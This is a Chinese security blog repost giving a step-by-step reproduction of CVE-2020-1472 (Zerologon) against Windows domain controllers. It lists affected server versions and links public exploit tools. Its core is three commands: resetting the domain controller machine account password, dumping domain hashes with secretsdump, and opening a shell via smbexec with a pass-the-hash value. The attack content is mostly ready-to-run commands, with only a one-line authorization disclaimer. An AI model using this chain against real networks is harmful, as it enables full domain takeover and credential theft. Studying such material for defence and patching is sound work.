-CVE-2020-1472 net logon RCE利用

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现-CVE-2020-1472 net logon RCE利用

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

  2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞  的风险通告,该漏洞编号为 CVE-2020-1472。
    攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。

图片[1]--CVE-2020-1472 net logon RCE利用-安全小天地

0x03 漏洞复现

漏洞影响:

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

利用工具下载:

impacket:https://github.com/SecureAuthCorp/impacket
域管理员密码重置poc:https://github.com/dirkjanm/CVE-2020-1472

1.重置管理员密钥

python3 cve-2020-1472-exploit.py WIN2019 x.x.x.x
图片[2]--CVE-2020-1472 net logon RCE利用-安全小天地

2.查看密码hash

python3 secretsdump.py  vulntarget.com/WIN2019\\$@x.x.x.x  -just-dc  -no-pas
图片[3]--CVE-2020-1472 net logon RCE利用-安全小天地

3.smbexec连接


python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@x.x.x.
图片[4]--CVE-2020-1472 net logon RCE利用-安全小天地
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)
------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称常用语 夸夸
夸夸
还有吗!没看够!
表情图片

    暂无评论内容